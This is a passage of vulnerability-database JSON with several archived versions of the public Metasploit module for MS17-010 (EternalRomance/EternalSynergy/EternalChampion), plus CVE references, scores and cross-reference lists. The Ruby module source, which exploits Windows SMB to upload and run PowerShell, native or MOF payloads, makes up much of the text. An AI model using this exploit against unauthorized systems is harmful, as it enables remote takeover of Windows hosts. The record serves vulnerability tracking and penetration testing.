"THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", 
"QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-07T18:25:39", "value": 6.8, "vector": "NONE"}}, "hash": "79ede44b6880f46c946d2f2b7d2e514c", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2020-03-07T18:25:39", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. 
This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 10\n },\n 'References' =>\n [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n end\n\n def exploit\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn()\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'])\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'])\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": 
"metasploit", "viewCount": 1334}, "differentElements": ["published", "modified"], "edition": 124, "lastseen": "2020-03-07T18:25:39"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2018-05-20T19:18:01", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "metasploitReliability": "Normal", "modified": "2018-05-14T21:45:20", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. 
This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10,\n 'EXITFUNC' => 'thread'\n },\n 'References' =>\n [\n [ 'AKA', 'ETERNALSYNERGY' ],\n [ 'AKA', 'ETERNALROMANCE' ],\n [ 'AKA', 'ETERNALCHAMPION' ],\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017'\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n end\n\n def exploit\n begin\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn()\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'])\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'])\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 238}, "differentElements": ["published", "modified"], "edition": 25, "lastseen": "2018-05-20T19:18:01"}, {"bulletin": 
{"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec payload code execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-08-23T19:06:33", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": 
["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": 
["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-08-23T19:06:33", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "67b81d82daf86b6b3d0a1c4896e1c0bc", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "lastseen": "2020-08-23T19:06:33", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-06-09T12:18:52", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. 
This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec payload code execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n 'Author' =>\n [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 10\n },\n 'References' =>\n [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'PowerShell', { } ],\n [ 'Native upload', { } ],\n [ 'MOF upload', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options(\n [\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{datastore['RHOST']} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(datastore['RHOST'])\n smb_pwn()\n\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn\n service_filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\n service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''\n\n case target.name\n when 'Automatic'\n if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])\n print_status('Selecting PowerShell target')\n execute_powershell_payload\n else\n print_status('Selecting native target')\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n end\n when 'PowerShell'\n execute_powershell_payload\n when 'Native upload'\n native_upload(datastore['SHARE'], service_filename, service_encoder)\n when 'MOF upload'\n mof_upload(datastore['SHARE'])\n end\n\n 
handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_psexec.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution", "type": "metasploit", "viewCount": 1649}, "differentElements": ["published", "modified"], "edition": 181, "lastseen": "2020-08-23T19:06:33"}], "viewCount": 2103, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "mscve", "idList": 
["MS:CVE-2017-0143", "MS:CVE-2017-0146", "MS:CVE-2017-0147"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}], "modified": "2020-10-07T20:08:39", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2020-10-07T20:08:39", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_psexec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include 